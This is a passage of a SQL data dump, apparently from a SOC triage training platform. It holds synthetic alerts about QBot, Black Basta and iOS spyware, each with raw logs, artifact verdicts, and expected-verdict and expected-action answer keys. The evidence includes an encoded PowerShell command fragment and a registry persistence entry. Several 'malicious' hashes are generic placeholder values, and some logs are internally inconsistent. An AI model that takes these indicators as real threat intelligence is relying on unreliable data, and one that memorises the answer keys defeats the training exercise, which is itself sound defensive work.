Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T11:45:23Z\\\",\\\"event_type\\\":\\\"profile_install\\\",\\\"device_id\\\":\\\"ios-device-1234\\\",\\\"user\\\":\\\"jdoe\\\",\\\"profile_name\\\":\\\"com.apple.security\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\\",\\\"filename\\\":\\\"malicious_profile.mobileconfig\\\",\\\"action\\\":\\\"install\\\",\\\"status\\\":\\\"successful\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T11:45:23Z\\\",\\\"event_type\\\":\\\"profile_install\\\",\\\"device_id\\\":\\\"ios-device-1234\\\",\\\"user\\\":\\\"jdoe\\\",\\\"profile_name\\\":\\\"com.apple.security\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\\",\\\"filename\\\":\\\"malicious_profile.mobileconfig\\\",\\\"action\\\":\\\"install\\\",\\\"status\\\":\\\"successful\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T11:45:23Z\\\",\\\"event_type\\\":\\\"profile_install\\\",\\\"device_id\\\":\\\"ios-device-1234\\\",\\\"user\\\":\\\"jdoe\\\",\\\"profile_name\\\":\\\"com.apple.security\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\\",\\\"filename\\\":\\\"malicious_profile.mobileconfig\\\",\\\"action\\\":\\\"install\\\",\\\"status\\\":\\\"successful\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T11:45:23Z\\\",\\\"event_type\\\":\\\"profile_install\\\",\\\"device_id\\\":\\\"ios-device-1234\\\",\\\"user\\\":\\\"jdoe\\\",\\\"profile_name\\\":\\\"com.apple.security\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\\",\\\"filename\\\":\\\"malicious_profile.mobileconfig\\\",\\\"action\\\":\\\"install\\\",\\\"status\\\":\\\"successful\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T11:45:23Z\\\",\\\"event_type\\\":\\\"profile_install\\\",\\\"device_id\\\":\\\"ios-device-1234\\\",\\\"user\\\":\\\"jdoe\\\",\\\"profile_name\\\":\\\"com.apple.security\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\\",\\\"filename\\\":\\\"malicious_profile.mobileconfig\\\",\\\"action\\\":\\\"install\\\",\\\"status\\\":\\\"successful\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1535, 'Lateral Movement to Connected iCloud Services', 'high', 'Cloud Access Logs', 'The spyware leverages obtained credentials to move laterally, accessing other iCloud services linked to the target, expanding the attack scope. The attacker utilized compromised credentials to log into multiple iCloud accounts, indicating a progression in the attack chain aimed at exfiltrating sensitive data.', 'Credential Access', 'T1078 - Valid Accounts', 1, 'Closed', 283, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"event\":\"login\",\"source_ip\":\"203.0.113.45\",\"destination_service\":\"iCloud\",\"user\":\"compromisedUser@icloud.com\",\"action\":\"successful login\",\"associated_ip\":\"192.168.1.15\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious_payload.exe\",\"correlation_id\":\"abcd1234efgh5678\"}', '2026-03-15 19:11:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromisedUser@icloud.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Username used in unauthorized access attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash belongs to malware used in lateral movement activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, 
NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.408Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:00Z\\\",\\\"event\\\":\\\"login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_service\\\":\\\"iCloud\\\",\\\"user\\\":\\\"compromisedUser@icloud.com\\\",\\\"action\\\":\\\"successful login\\\",\\\"associated_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"correlation_id\\\":\\\"abcd1234efgh5678\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.408Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:00Z\\\",\\\"event\\\":\\\"login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_service\\\":\\\"iCloud\\\",\\\"user\\\":\\\"compromisedUser@icloud.com\\\",\\\"action\\\":\\\"successful login\\\",\\\"associated_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"correlation_id\\\":\\\"abcd1234efgh5678\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.408Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:00Z\\\",\\\"event\\\":\\\"login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_service\\\":\\\"iCloud\\\",\\\"user\\\":\\\"compromisedUser@icloud.com\\\",\\\"action\\\":\\\"successful 
login\\\",\\\"associated_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"correlation_id\\\":\\\"abcd1234efgh5678\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.408Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:00Z\\\",\\\"event\\\":\\\"login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_service\\\":\\\"iCloud\\\",\\\"user\\\":\\\"compromisedUser@icloud.com\\\",\\\"action\\\":\\\"successful login\\\",\\\"associated_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"correlation_id\\\":\\\"abcd1234efgh5678\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.408Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:00Z\\\",\\\"event\\\":\\\"login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_service\\\":\\\"iCloud\\\",\\\"user\\\":\\\"compromisedUser@icloud.com\\\",\\\"action\\\":\\\"successful login\\\",\\\"associated_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"correlation_id\\\":\\\"abcd1234efgh5678\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1536, 'Exfiltration of Sensitive Data to External Servers', 'high', 'Outbound Network Traffic', 'Sensitive information gathered by REIGN is silently exfiltrated to external servers, providing valuable intelligence to Quadream\'s government clients.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'Closed', 283, '{\"timestamp\":\"2023-10-15T14:23:15Z\",\"source_ip\":\"10.0.3.15\",\"destination_ip\":\"203.0.113.45\",\"source_port\":54321,\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"classified_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"exfiltration_attempt\",\"status\":\"success\"}', '2026-03-15 19:11:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known Quadream-controlled server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"suspicious\",\"details\":\"Associated with data exfiltration activities\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"classified_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file involved in exfiltration\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal user 
account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1537, 'Suspicious Email Detected with Malicious Attachment', 'high', 'Corporate Email Gateway Logs', 'An email was detected with a potentially malicious attachment that is suspected to be the initial vector for QBot deployment, commonly associated with Black Basta.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T09:23:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.15\",\"source_user\":\"jdoe@example.com\",\"destination_user\":\"support@target.com\",\"subject\":\"Important Update - Action Required\",\"attachment\":{\"filename\":\"Invoice_2023_10_12.xlsm\",\"file_hash\":\"d4c3b2a9745f2a89e7b5a1c3e4f9d4c7\",\"size\":124578},\"malware_family\":\"QBot\",\"threat_intel\":{\"related_ips\":[\"203.0.113.15\"],\"related_hashes\":[\"d4c3b2a9745f2a89e7b5a1c3e4f9d4c7\"],\"verdict\":\"malicious\"}}', '2026-03-15 19:11:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for QBot.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d4c3b2a9745f2a89e7b5a1c3e4f9d4c7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with QBot malware.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"jdoe@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Corporate Directory\",\"verdict\":\"internal\",\"details\":\"Internal user identified as potential victim.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected with Malicious Attachment\",\"date\":\"2026-03-15T20:58:15.416Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1538, 'QBot Malware Execution Identified', 'high', 'Endpoint Detection and Response (EDR) System', 'A QBot payload was executed on the victim\'s machine following a phishing email, establishing a foothold for further infiltration.', 'Malware Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"process_creation\",\"hostname\":\"victim-pc.local\",\"user\":\"j.doe\",\"process_name\":\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\qbot.exe\",\"process_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"source_ip\":\"10.0.0.23\",\"destination_ip\":\"89.123.45.67\",\"command_line\":\"\\\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\qbot.exe\\\" --silent\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":1234,\"file_path\":\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\qbot.exe\",\"network_activity\":{\"outbound_connections\":[{\"remote_ip\":\"89.123.45.67\",\"remote_port\":443}]}}', '2026-03-15 19:11:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known QBot malware hash\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"89.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with QBot C2 servers\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\qbot.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalAnalysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern matches known QBot deployment\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalUserDatabase\",\"verdict\":\"internal\",\"details\":\"Employee user 
account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1539, 'Persistence Mechanism Established via Registry Modification', 'high', 'Windows Registry Logs', 'Black Basta has modified the registry to establish persistence on the compromised system, indicating potential Conti heritage.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":4657,\"computer_name\":\"compromised-host.local\",\"user\":\"malicious_user\",\"registry_key_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\BlackBastaPersistence\",\"registry_value_name\":\"BlackBastaService\",\"registry_value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\\\"\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"process_id\":1234,\"source_ip\":\"185.123.45.67\",\"internal_ip\":\"192.168.1.100\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:11:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Black Basta operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware samples.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used for unauthorized registry 
modifications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\BlackBastaPersistence\\\",\\\"registry_value_name\\\":\\\"BlackBastaService\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\\\\\"\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"process_id\\\":1234,\\\"source_ip\\\":\\\"185.123.45.67\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\BlackBastaPersistence\\\",\\\"registry_value_name\\\":\\\"BlackBastaService\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k 
netsvcs\\\\\\\"\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"process_id\\\":1234,\\\"source_ip\\\":\\\"185.123.45.67\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\BlackBastaPersistence\\\",\\\"registry_value_name\\\":\\\"BlackBastaService\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\\\\\"\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"process_id\\\":1234,\\\"source_ip\\\":\\\"185.123.45.67\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\BlackBastaPersistence\\\",\\\"registry_value_name\\\":\\\"BlackBastaService\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k 
netsvcs\\\\\\\"\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"process_id\\\":1234,\\\"source_ip\\\":\\\"185.123.45.67\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\BlackBastaPersistence\\\",\\\"registry_value_name\\\":\\\"BlackBastaService\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\\\\\"\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"process_id\\\":1234,\\\"source_ip\\\":\\\"185.123.45.67\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1540, 'Lateral Movement Detected Across Network', 'high', 'Network Traffic Analysis', 'With persistence established, the attackers begin lateral movement using compromised credentials, spreading QBot to additional systems and escalating their control.', 'Lateral Movement', 'T1550 - Use Alternate Authentication Material', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:06:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"192.168.1.87\",\"external_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_filename\":\"qbot_payload.exe\",\"action\":\"lateral_movement\",\"protocol\":\"SMB\",\"description\":\"Detected lateral movement using compromised credentials to spread QBot malware.\"}', '2026-03-15 19:11:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.87\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target host.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with QBot C2 server.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to QBot malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"qbot_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"malicious\",\"details\":\"Executable file 
